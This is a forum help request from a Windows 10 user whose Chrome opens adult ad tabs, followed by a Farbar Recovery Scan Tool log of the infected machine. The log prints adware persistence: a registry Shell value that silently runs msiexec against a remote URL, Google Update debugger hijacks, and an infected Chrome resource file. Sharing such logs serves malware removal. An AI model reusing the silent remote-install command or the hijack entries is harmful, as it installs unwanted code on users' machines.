Chrome shows ads despite ADBLOCK Plus being installed

I use Chrome, and when I click on a site it automatically opens another site in a second tab (ads, sexy ads; I don't go to sexy sites at all because I know there is all kinds of filth there). This second tab with ads opening by itself irritates me.


I use Windows 10, ADSL internet connected by cable, speed 10 MB/S, MTS.


Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 20-08-2017
Ran by dejan (administrator) on DEJAN-PC (21-08-2017 21:41:17)
Running from C:\Users\dejan\Desktop
Loaded Profiles: dejan (Available Profiles: dejan)
Platform: Microsoft Windows 10 Pro Version 1703 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Systems, Incorporated) C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgwdsvcx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avgsvcx.exe
(Digital Wave Ltd.) C:\Program Files\Common Files\DVDVideoSoft\lib\app_updater.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(Popcorn Time) C:\Program Files\Popcorn Time\Updater.exe
(Copyright 2017.) C:\Program Files\Zemana AntiMalware\ZAM.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgcsrvx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avguix.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgui.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgcfgex.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [485280 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [15111680 2017-02-10] (Realtek Semiconductor)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [587288 2017-03-15] (Oracle Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [AvgUi] => C:\Program Files\AVG\Framework\Common\avguirnx.exe [220944 2016-12-06] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\Framework\Common\avguirnx.exe [220944 2016-12-06] (AVG Technologies CZ, s.r.o.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [Viber] => C:\Users\dejan\AppData\Local\Viber\Viber.exe [30676560 2017-05-06] (Viber Media S.à r.l.)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [7658200 2017-06-30] (Piriform Ltd)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Run: [IDMan] => C:\Program Files\Internet Download Manager\IDMan.exe [4005944 2017-02-14] (Tonec Inc.)
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88OYU3RTwyRjE3OWUyMdYyFjY2NkE2NUZXRjq2NWH5Fq== /q <==== ATTENTION
HKLM\...\Providers\9xihyc2u: C:\Program Files\Steerwardpriboly Builder\local32spl.dll <==== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {D53A7C8A-0595-11E7-85F9-64006A5CFC35} - -> No File
Startup: C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2017-08-14]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\dejan\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{938526f2-0a05-4077-a0e9-c9636044b755}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{938526f2-0a05-4077-a0e9-c9636044b755}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{df927024-ee76-41e9-bec0-c7ce2732a227}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{df927024-ee76-41e9-bec0-c7ce2732a227}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
SearchScopes: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files\Internet Download Manager\IDMIECC.dll [2016-12-10] (Internet Download Manager, Tonec Inc.)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_131\bin\ssv.dll [2017-04-24] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-04-24] (Oracle Corporation)

Edge:
======
Edge HomeButtonPage: HKU\S-1-5-21-2725342497-1767379937-2485888434-1001 -> about:start

FireFox:
========
FF ProfilePath: C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467 [2017-08-21]
FF Homepage: Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467 -> www.google.com
FF Extension: (Vlc context menu) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\vlcplaylist@helgatauscher.de.xpi [2017-05-28]
FF Extension: (VideoDownloadConverter) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\_4zMembers_@www.videodownloadconverter.com [2017-08-21]
FF Extension: (Video DownloadHelper) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-08-21]
FF Extension: (Adblock Plus) - C:\Users\dejan\AppData\Roaming\Mozilla\Firefox\Profiles\6unxlt1d.default-1476917329467\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-08-21]
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files\Internet Download Manager\idmmzcc2.xpi [2017-01-26]
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\dejan\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\dejan\AppData\Roaming\IDM\idmmzcc5 [2017-08-20] [not signed]
FF Plugin: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-04-24] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-04-24] (Oracle Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [No File]

Chrome:
=======
CHR res: Infected resources.pak (search_engine). Reinstall Chrome. <==== ATTENTION
CHR DefaultProfile: ChromeDefaultData
CHR Profile: C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-08-21] <==== ATTENTION
CHR Extension: (Google Translate) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2017-01-29]
CHR Extension: (Google Slides) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-01-28]
CHR Extension: (Focusing On Wildlife) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\agacdhlpeofcinfkjdpgmagndibbbidj [2017-07-08]
CHR Extension: (Nice Day (weather)) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\akmijnhpfgblhkbdlnbldpmjgaiognoo [2017-03-16]
CHR Extension: (Google Docs) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-01-28]
CHR Extension: (Google Drive) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-01-28]
CHR Extension: (YouTube) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-28]
CHR Extension: (Adblock Plus) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-07-14]
CHR Extension: (Notifier for Gmail™) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\dcjichoefijpinlfnjghokpkojhlhkgl [2017-04-14]
CHR Extension: (SBRO Safe Browsing) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\eglegmheckaainhhlaiogafaecfgfbga [2017-04-14]
CHR Extension: (Google Sheets) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-01-28]
CHR Extension: (Tampermonkey BETA) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\gcalenpjmijncebpfijmoaglllgpjagf [2017-08-07]
CHR Extension: (Google Docs Offline) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-01-28]
CHR Extension: (Messenger) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\hiflndhkocfnebikccoedenpdnfjifcn [2017-02-26]
CHR Extension: (Unseen) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\iicapmagmhahddefgokbabbgieiogjop [2017-03-19]
CHR Extension: (Serfs Emancipation Day) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\jjhpggngpgmfhjcmbipomdpmpfcmcpnp [2017-03-30]
CHR Extension: (Image Search Options) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\kljmejbpilkadikecejccebmccagifhl [2017-03-22]
CHR Extension: (IDM Integration Module) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2017-07-15]
CHR Extension: (Chrome Web Store Payments) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-11]
CHR Extension: (Chrome NPAPI Replacement) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\okoafaojkokbmieeefnflkiklhanpeoc [2017-07-26]
CHR Extension: (Isasus) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pefapomofmnppmpggkkblepbaclckfcb [2017-08-09]
CHR Extension: (Home in Open Listings) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pfebdofkcophcpfikbieldpnajnkonoo [2017-05-30]
CHR Extension: (Gmail) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-01-28]
CHR Extension: (Chrome Media Router) - C:\Users\dejan\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files\Internet Download Manager\IDMGCExt.crx [2017-02-13]
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Applemy\Application\chrome.exe <==== ATTENTION

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AGSService; C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S3 AvgAMPS; C:\Program Files\AVG\Av\avgamps.exe [1002544 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 avgfws; C:\Program Files\AVG\Av\avgfws.exe [1458352 2017-06-26] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\Av\avgidsagent.exe [4153400 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 avgsvc; C:\Program Files\AVG\Framework\Common\avgsvcx.exe [935184 2016-12-06] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\Av\avgwdsvcx.exe [606352 2017-06-26] (AVG Technologies CZ, s.r.o.)
R2 DigitalWave.Update.Service; C:\Program Files\Common Files\DVDVideoSoft\lib\app_updater.exe [392168 2016-08-31] (Digital Wave Ltd.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2545848 2017-03-18] (Microsoft Corporation)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [10883824 2017-03-17] (TeamViewer GmbH)
R2 Update service; C:\Program Files\Popcorn Time\Updater.exe [339968 2016-08-26] (Popcorn Time) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [265352 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [82488 2017-06-20] (Microsoft Corporation)
R2 ZAMSvc; C:\Program Files\Zemana AntiMalware\ZAM.exe [14554768 2017-04-29] (Copyright 2017.)
S2 BIT; C:\ProgramData\BIT\BIT.dll [X] <==== ATTENTION

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AndnetBus; C:\WINDOWS\System32\drivers\lgandnetbus.sys [15744 2014-10-09] (LG Electronics Inc.)
S3 AndNetDiag; C:\WINDOWS\system32\DRIVERS\lgandnetdiag.sys [23680 2014-10-09] (LG Electronics Inc.)
S3 ANDNetModem; C:\WINDOWS\system32\DRIVERS\lgandnetmodem.sys [28416 2014-10-09] (LG Electronics Inc.)
S0 Avgbootx; C:\WINDOWS\System32\DRIVERS\avgbootx.sys [19584 2016-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [134912 2016-05-13] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\WINDOWS\system32\DRIVERS\avgfwd6x.sys [67336 2016-10-23] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\WINDOWS\System32\DRIVERS\avgidsdriverx.sys [259328 2017-03-23] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [207616 2016-10-05] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\WINDOWS\system32\DRIVERS\avgidsshimw8x.sys [41216 2016-08-02] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [244992 2016-11-30] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [287008 2016-02-16] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [197376 2017-04-11] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [47360 2016-06-01] (AVG Technologies CZ, s.r.o.)
R0 avgunivx; C:\WINDOWS\System32\DRIVERS\avgunivx.sys [65280 2016-06-20] (AVG Technologies CZ, s.r.o.)
R1 Avgwfpx; C:\WINDOWS\system32\DRIVERS\avgwfpx.sys [246536 2016-08-04] (AVG Technologies CZ, s.r.o.)
R1 cryptfd; C:\WINDOWS\System32\drivers\cryptfd.sys [176552 2017-03-03] ()
S3 dg_ksudbus; C:\WINDOWS\System32\drivers\ksudbus.sys [75776 2011-03-25] (Microsoft Corporation) [File not signed]
S3 HtcUsbMdmV32; C:\WINDOWS\system32\DRIVERS\HtcUsbMdmV32.sys [105984 2009-10-27] (QUALCOMM Incorporated)
R1 lnvguard; C:\WINDOWS\System32\DRIVERS\lnvguard.sys [83392 2016-12-01] (Huorong Borui (Beijing) Technology Co., Ltd.)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [170200 2017-08-08] (Malwarebytes)
S3 pneteth; C:\WINDOWS\System32\drivers\pneteth.sys [13440 2011-11-25] (June Fabrics Technology Inc.)
R0 pwdrvio; C:\WINDOWS\System32\pwdrvio.sys [17160 2015-03-05] ()
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [13064 2016-11-24] ()
S3 qcfilter; C:\WINDOWS\System32\drivers\qcusbfilter.sys [39456 2015-09-25] (QUALCOMM Incorporated)
S3 qcusbser; C:\WINDOWS\system32\DRIVERS\qcusbser.sys [214560 2015-09-25] (QUALCOMM Incorporated)
R3 rt640x86; C:\WINDOWS\System32\drivers\rt640x86.sys [795648 2017-02-20] (Realtek )
S3 usbbus; C:\WINDOWS\System32\drivers\lgusbbus.sys [13056 2014-05-27] (LG Electronics Inc.)
S3 UsbDiag; C:\WINDOWS\system32\DRIVERS\lgusbdiag.sys [20864 2014-05-27] (LG Electronics Inc.)
S3 USBModem; C:\WINDOWS\system32\DRIVERS\lgusbmodem.sys [25216 2014-05-27] (LG Electronics Inc.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [37464 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [243104 2017-03-18] (Microsoft Corporation)
S3 wdf_usb; C:\WINDOWS\system32\drivers\usb2ser.sys [128704 2016-08-16] (MBB)
S3 wdm_usb; C:\WINDOWS\System32\drivers\usb2ser.sys [128704 2016-08-16] (MBB)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [96672 2017-03-18] (Microsoft Corporation)
S3 WUDFWpdMtp; C:\WINDOWS\System32\drivers\WUDFRd.sys [160256 2017-03-18] (Microsoft Corporation)
R1 ZAM; C:\WINDOWS\System32\drivers\zam32.sys [181496 2016-10-15] (Zemana Ltd.)
R1 ZAM_Guard; C:\WINDOWS\System32\drivers\zamguard32.sys [181496 2016-10-15] (Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-08-21 21:41 - 2017-08-21 21:42 - 000019136 _____ C:\Users\dejan\Desktop\FRST.txt
2017-08-21 21:40 - 2017-08-21 21:40 - 001792512 _____ (Farbar) C:\Users\dejan\Desktop\FRST.exe
2017-08-21 21:37 - 2017-08-21 21:41 - 000000000 ____D C:\FRST
2017-08-21 21:37 - 2017-08-21 21:37 - 000000000 ____D C:\Users\dejan\Desktop\FRST-OlderVersion
2017-08-19 19:24 - 2017-08-19 19:24 - 000000000 ____H C:\Users\dejan\Documents\Default.rdp
2017-08-14 23:44 - 2017-08-14 23:44 - 000001227 _____ C:\Users\dejan\Desktop\Facebook Gameroom.lnk
2017-08-14 23:43 - 2017-08-14 23:44 - 000000000 ____D C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Facebook
2017-08-13 22:40 - 2017-08-13 22:40 - 000260776 _____ (Facebook) C:\Users\dejan\Downloads\FacebookGameroom.exe
2017-08-09 22:03 - 2017-08-01 04:47 - 005862816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-08-09 22:03 - 2017-08-01 04:43 - 000273312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-08-09 22:03 - 2017-08-01 04:41 - 000095648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-08-09 22:03 - 2017-08-01 04:38 - 000406544 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-08-09 22:03 - 2017-08-01 04:37 - 002023832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-08-09 22:03 - 2017-08-01 04:37 - 000582560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-08-09 22:03 - 2017-08-01 04:36 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-08-09 22:03 - 2017-08-01 04:36 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-08-09 22:03 - 2017-08-01 04:36 - 000173984 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-08-09 22:03 - 2017-08-01 04:35 - 000280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2017-08-09 22:03 - 2017-08-01 04:35 - 000133904 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2017-08-09 22:03 - 2017-08-01 04:34 - 000610584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000359552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-08-09 22:03 - 2017-08-01 04:34 - 000168864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2017-08-09 22:03 - 2017-08-01 04:31 - 000176024 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-08-09 22:03 - 2017-08-01 04:20 - 002956288 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-08-09 22:03 - 2017-08-01 04:18 - 013841408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-08-09 22:03 - 2017-08-01 04:18 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-08-09 22:03 - 2017-08-01 04:17 - 000034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\tokenbinding.dll
2017-08-09 22:03 - 2017-08-01 04:16 - 000080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-08-09 22:03 - 2017-08-01 04:14 - 000035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscore.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 020504064 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-08-09 22:03 - 2017-08-01 04:13 - 000121344 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2017-08-09 22:03 - 2017-08-01 04:12 - 019336192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-08-09 22:03 - 2017-08-01 04:12 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-08-09 22:03 - 2017-08-01 04:11 - 000187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-08-09 22:03 - 2017-08-01 04:10 - 000905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-08-09 22:03 - 2017-08-01 04:10 - 000358400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-08-09 22:03 - 2017-08-01 04:08 - 000267264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncryptprov.dll
2017-08-09 22:03 - 2017-08-01 04:08 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 011870208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 005961728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 003447296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-08-09 22:03 - 2017-08-01 04:07 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 001585152 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-08-09 22:03 - 2017-08-01 04:06 - 001087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 000798208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-08-09 22:03 - 2017-08-01 04:06 - 000236032 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvsvc.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 006269440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-08-09 22:03 - 2017-08-01 04:04 - 001831936 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-08-09 22:03 - 2017-08-01 04:03 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-08-09 22:03 - 2017-08-01 04:01 - 000547328 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-08-09 22:03 - 2017-08-01 04:01 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-08-09 22:03 - 2017-08-01 00:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjet40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswdat10.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswstr10.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000616448 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrepl40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000518144 _____ C:\WINDOWS\system32\msjetoledb40.dll
